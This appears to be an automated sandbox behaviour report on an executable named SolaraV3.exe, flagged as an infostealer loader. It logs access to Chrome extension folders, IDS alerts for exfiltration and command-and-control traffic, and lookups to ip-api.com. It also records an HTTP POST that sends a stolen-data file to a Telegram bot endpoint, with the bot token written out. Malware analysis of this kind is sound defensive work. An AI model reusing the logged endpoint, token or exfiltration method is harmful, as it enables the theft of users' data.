Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2857751 - Severity 1 - ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) : 192.168.2.7:49733 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2857752 - Severity 1 - ETPRO MALWARE SynthIndi Loader CnC Response : 149.154.167.220:443 -> 192.168.2.7:49733

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View

ASN Name: TUT-ASUS TUT-ASUS

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: blank-a0m8c.in
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 727354User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=1c1a3fa26118796b784a6413d888e095

Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SolaraV3.exe, 00000002.00000003.2036193521.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772675599.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: SolaraV3.exe, rar.exe.1.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: SolaraV3.exe, 00000002.00000002.2039145947.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039829113.000001FC2536E000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035293287.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039554025.000001FC25361000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035172460.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2034874254.000001FC25360000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1743305378.000001FC252ED000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035050176.000001FC2536A000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036060899.000001FC25325000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC252E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1794892126.00000267C15D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2811239822.000001407C800000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1908054026.00000239FE760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: SolaraV3.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: SolaraV3.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: SolaraV3.exe, 00000001.00000002.2058209847.000001EA23108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.j$
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: powershell.exe, 0000004A.00000002.1908054026.00000239FE760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: svchost.exe, 0000001A.00000002.2811239822.000001407C800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SH
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: _socket.pyd.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: SolaraV3.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: SolaraV3.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: SolaraV3.exe, 00000002.00000002.2038113836.000001FC24F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.26.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000001A.00000003.1634045934.000001407C750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC253DF000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC253E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr
Source: SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://logo.ve
Source: SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://logo.veANIFE~1JSO
Source: SolaraV3.exe, 00000002.00000003.1695774309.000001FC2531F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://logo.veW
